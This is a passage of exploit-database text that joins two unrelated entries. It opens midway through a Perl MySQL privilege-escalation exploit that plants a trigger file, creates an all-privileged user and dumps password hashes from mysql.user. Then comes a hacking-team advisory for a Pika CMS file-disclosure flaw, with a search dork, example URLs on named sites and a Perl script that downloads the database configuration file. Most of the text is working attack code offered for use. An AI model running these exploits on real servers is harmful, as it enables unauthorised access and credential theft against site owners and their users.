"SELECT 'TYPE=TRIGGERNAME\\ntrigger_table=rootme;' into outfile '".$folder.$database."/atk.TRN' FIELDS ESCAPED BY ''";

my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
                       "$user", "$password",
                       {'RaiseError' => 0});
eval { $dbh->do("DROP TABLE rootme") };
$dbh->do("CREATE TABLE rootme (rootme VARCHAR(256));");
$dbh->do($inject);
$dbh->do($inject2);

$a = "A" x 10000;
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");

sleep(3);

my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
                       "$user", "$password",
                       {'RaiseError' => 0});

$dbh->do("INSERT INTO rootme VALUES('ROOTED');");
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");

sleep(3);

my $dbh = DBI->connect("DBI:mysql:database=$database;host=$target;",
                       "$user", "$password",
                       {'RaiseError' => 0});

$dbh->do("CREATE USER '$newuser'\@'%' IDENTIFIED BY '$newuserpass';");
$dbh->do("GRANT ALL PRIVILEGES ON *.* TO '$newuser'\@'%' WITH GRANT OPTION;");
$dbh->do("grant all on $a.* to 'user'\@'%' identified by 'secret';");

sleep(3);

my $dbh = DBI->connect("DBI:mysql:host=$target;",
                       $newuser, $newuserpass,
                       {'RaiseError' => 0});

my $sth = $dbh->prepare("SELECT * FROM mysql.user");
$sth->execute();

print "W00TW00T!\n";

while (my $ref = $sth->fetchrow_hashref()) {
print "Found a row: id = $ref->{'User'}, name = $ref->{'Password'}\n";
}
$sth->finish();

Pika CMS <= Remote 'baza_mysql.php' Disclosure  Exploit
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KnocKout member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Live Contact : knockoutr@msn.com
[~] E-Mail : knockout@e-mail.com.tr
[~] HomePage : http://h4x0resec.blogspot.com - http://1337day.com
[~] Reference : http://h4x0resec.blogspot.com
[~] Special Thanks : Kalashinkov3 <= :)
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Pika CMS
|~Price : N/A
|~Version : N/A
|~Software: http://www.pikacms.com/
|~Vulnerability Style :  file disclosure
|~Vulnerability Dir : /
|~Google Keyword : "Powered by PikaCMS!"
|[~]Date : "31.05.2011"
----------------------------------------------------------
shkarko.php <= 'f' Functions Not Security
---------------------------------------------------------
               Manual Exploitation

http://www.fleteteverdha.info/shkarko.php?f=lidhjet/baza_mysql.php
http://www.pikacms.com/shkarko.php?f=lidhjet/baza_mysql.php
http://www.vetemlojra.com/shkarko.php?f=lidhjet/baza_mysql.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

    =============== Automatic Disclosure Exploit (PikaCms.PL) =================================================
use LWP::Simple;
use LWP::UserAgent;
system('cls');
system('title Pika CMS <= Remote 'baza_mysql.php' Disclosure  Exploit');
system('color 2');
if(@ARGV < 2)
{
print "[-]Su Sekilde Kocum. \n\n";
&amp;help; exit();
}
sub help()
{
print "[+] usage1 : perl $0 HedefWeb /path/ \n";
print "[+] usage2 : perl $0 localhost / \n";
}
print "\n************************************************************************\n";
print "\* Pika CMS <= Remote 'baza_mysql.php' Disclosure  Exploit              *\n";
print "\* Exploited By : KnocKout                                                  *\n";
print "\* Contact :   knockoutr[at]msn[dot]com                                 *\n";
print "\* --                                    *\n";
print "\*********************************************************************\n\n\n";
($TargetIP, $path, $File,) = @ARGV;
$File="shkarko.php?f=lidhjet/baza_mysql.php";
my $url = "http://" . $TargetIP . $path . $File;
print "\n Az Bekle Sikertiyorum!!! \n\n";
my $useragent = LWP::UserAgent->new();
my $request = $useragent->get($url,":content_file" => "baza_mysql.php");
if ($request->is_success)
{
print "[+] $url <= Hedef Site Exploit Edildi!\n\n";
print "[+] OPERASYON TAMAM !\n";
print "[+] baza_mysql.php Dosyasi Indirildi (z_WALKING_TIMES_DATA.php)\n";
print "[+] GRAYHATZ STAR \n";
print "[+] Special tnX # + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ .... 
 \n";
exit();
}
else
{
print "[!] Exploit $url Basarisiz !\n[!] ".$request->status_line."\n";
exit();
}



    ================================================================

                .__        _____        _______                 
                |  |__    /  |  |___  __\   _  \_______   ____  
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \ 
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/ 
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/ 
                         _____________________________  
                        /   _____/\_   _____/\_   ___ \ 
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/ 
                                       Was Here.


# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * agix * KedAns-Dz
# gunslinger_ * Sn!pEr.S!Te * ZoRLu * anT!-Tr0J4n 'www.1337day.com/team' ++ ....